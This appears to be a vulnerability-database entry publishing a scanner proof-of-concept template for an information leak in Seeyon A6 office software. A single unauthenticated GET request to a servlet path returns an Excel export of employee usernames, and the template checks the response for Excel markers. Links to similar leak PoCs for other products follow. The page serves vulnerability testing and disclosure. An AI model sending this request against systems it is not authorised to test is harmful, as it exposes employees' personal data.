seeyon-a6-employee-info-leak: seeyon a6 employee info leak

漏洞描述

PoC代码[已公开]

id: seeyon-a6-employee-info-leak

info:
  name: seeyon a6 employee info leak
  author: sakura404x
  severity: high
  verified: true
  description: |-
    app="Seeyon-A6"
  tags: seeyon,disclosure
  created: 2023/10/29

rules:
  r0:
    request:
      method: GET
      path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
    expression: response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet")
expression: r0()

相关漏洞推荐

• nsfocus-uts-password-leak: Nsfocus uts password leak
• firewall-password-leak: 防火墙硬编码漏洞
• seeyon-oa-getajaxdataservlet-xxe: 致远OA getAjaxDataServlet XXE
• seeyon-wooyun-2015-0108235-sqli: seeyon wooyun 2015 0108235 sqli
• seeyon-wooyun-2015-148227: Seeyon WooYun LFR
• svn-leak: SVM 代码托管泄漏
• POC seeyon-a8-management-monitor-default-password: A8 Management Monitor Default Password
• POC aspcms-backend-leak: ASPCMS Backend Leak
• POC dlink-850l-password-leak: Dlink 850l Information Disclosure
• POC ecology-e-office-mysql-config-leak: 泛微OA E-Office mysql_config.ini 数据库信息泄漏
• POC hjtcloud-directory-file-leak: Hjtcloud Directory File Leak
• POC ruijie-eg-password-leak: Ruijie EG Information Disaclosure
• POC ruijie-nbr1300g-cli-password-leak: ruijie-nbr1300g-cli-password-leak